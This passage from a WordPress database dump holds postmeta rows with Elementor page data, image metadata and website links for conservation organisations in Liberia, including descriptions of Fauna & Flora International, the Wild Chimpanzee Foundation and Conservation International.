etpack','classic-editor'),(27337,3041,'internet','https://web.facebook.com/ydsliberia/?_rdc=1&_rdr'),(27338,3041,'_pods_institution_logo','a:1:{i:0;i:3042;}'),(27340,2964,'_last_editor_used_jetpack','classic-editor'),(27341,3968,'_wp_attached_file','2020/02/habitat-for-humanity.png'),(27342,3968,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:32:\"2020/02/habitat-for-humanity.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"habitat-for-humanity-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:32:\"habitat-for-humanity-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:31:\"habitat-for-humanity-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:32:\"habitat-for-humanity-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(27343,2964,'internet','https://www.habitat.org/'),(27344,2964,'_pods_institution_logo','a:1:{i:0;i:3968;}'),(27345,2964,'institution_logo','3968'),(27346,3005,'_last_editor_used_jetpack','classic-editor'),(27347,3005,'internet',''),(27348,1614,'_last_editor_used_jetpack','classic-editor'),(27349,3972,'_elementor_edit_mode','builder'),(27350,3972,'_elementor_template_type','wp-post'),(27351,3972,'_elementor_version','2.7.5'),(27352,3972,'_wp_page_template','default'),(27353,3972,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a3e5fad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Fauna &amp; Flora International (FFI) began working in Liberia in 1997 and we played a crucial role, together with our partners, in re-establishing operations in the country\\u2019s oldest protected area \\u2013 Sapo National Park \\u2013 after years of civil conflict.<\\/p><p>Drawing on this work in Sapo, we have since worked closely with our partners to help identify and prioritise sites for a protected area network across Liberia and establish the foundations for sustainable forest and environmental management.<\\/p><p>We are also working extensively to improve collaboration between local, national, regional and private stakeholders across various sectors and national boundaries to reduce threats to biodiversity from subsistence pressures, oil palm operations and large-scale mining operations.<\\/p><p>Recognising the value of Liberian forests for carbon storage, biodiversity conservation and community well-being, we are also playing a lead role in the development of REDD+ project sites in the country.<\\/p><p>Community involvement in decision making is central to strengthening forest management and governance in a post-conflict Liberia, and we have supported a range of activities to ensure that communities within and surrounding East Nimba Nature Reserve, Wonegizi and Wologizi Proposed Protected Areas, and Sapo National Park are properly supported to engage in protected area management and conservation.<\\/p><p>FFI is also supporting Liberia\\u2019s up-and-coming conservationists by helping to build conservation capacity at a national level \\u2013 something that is currently limited due to a lack of practical and academic training opportunities. FFI is tackling these challenges by developing appropriate infrastructure and training courses, including university-level teaching as well as practical skills training such as biomonitoring, and conservation management skills such as proposal writing and grant management.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9a4752\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"602e7b89\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5a027f71\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f156dc7\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"ffi\\\",\\\"tag_id\\\":\\\"54\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"ffi\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"58a3e8b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"615c3465\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6bc66929\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"581f0bca\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:ffi\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(27354,3972,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(27355,3972,'_thumbnail_id','3192'),(27356,1614,'internet','https://www.fauna-flora.org/'),(27357,1614,'_pods_institution_logo','a:1:{i:0;i:2233;}'),(27358,1614,'institution_logo','2233'),(27359,3083,'_last_editor_used_jetpack','classic-editor'),(27360,3973,'_wp_attached_file','2020/06/wcf-one.png'),(27361,3973,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:19:\"2020/06/wcf-one.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"wcf-one-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:18:\"wcf-one-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(27362,3974,'_elementor_edit_mode','builder'),(27363,3974,'_elementor_template_type','wp-post'),(27364,3974,'_elementor_version','2.8.1'),(27365,3974,'_wp_page_template','default'),(27366,3974,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a3e5fad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Wild Chimpanzee Foundation\\u2019s mission is to enhance the survival of the remaining wild chimpanzee populations and their habitat, thereby participate in saving the behavioural diversity of this fascinating species. The philosophy of the WCF is threefold: Implement projects of Education, Conservation, and Research for and by the African people<\\/p><p>WCF implements conservation projects in C\\u00f4te d\\u2019Ivoire, Liberia and Guinea. We concentrate our activities in regions were wild chimpanzees are still abundant to ensure their future survival<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9a4752\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"602e7b89\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5a027f71\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f156dc7\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"ffi\\\",\\\"tag_id\\\":\\\"54\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"ffi\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"58a3e8b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"615c3465\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6bc66929\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"581f0bca\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:ffi\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(27367,3974,'_thumbnail_id','3194'),(27368,3974,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(27369,3083,'internet','https://www.wildchimps.org/'),(27370,3083,'_pods_institution_logo','a:1:{i:0;i:3973;}'),(27372,3083,'institution_logo','3973'),(27373,3006,'_last_editor_used_jetpack','classic-editor'),(27374,3006,'internet','https://greenstewardsinc.com/'),(27375,3006,'_pods_institution_logo','a:1:{i:0;i:3010;}'),(27377,3004,'_last_editor_used_jetpack','classic-editor'),(27378,3004,'internet','https://web.facebook.com/Ever-Green-Recycling-Institute-867748553557999/'),(27381,3980,'_elementor_edit_mode','builder'),(27382,3980,'_elementor_template_type','wp-post'),(27383,3980,'_elementor_version','2.7.5'),(27384,3980,'_wp_page_template','default'),(27385,3980,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"23bf9b5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As an affiliate of the global organization, Conservation International-Liberia works closely with communities, private sector, the government and civil society leaders to support nature conservation.<\\/p><p>Conservation International works to spotlight and secure the critical benefits that nature provides to humanity. Since its inception, CI have helped to protect more than 6 million square kilometers (2.3 million square miles) of land and sea across more than 70 countries. Currently with offices in 29 countries and 2,000 partners worldwide, CI\\u2019s reach is truly global.<\\/p><p>Building upon a strong foundation of science, partnership and field demonstration, Conservation International empowers societies to responsibly and sustainably care for nature, our global biodiversity, for the well-being of humanity.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a2232e5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"11bbe920\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3a1852cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"45f11703\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"ci\\\",\\\"tag_id\\\":\\\"50\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"ci\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2db389f5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[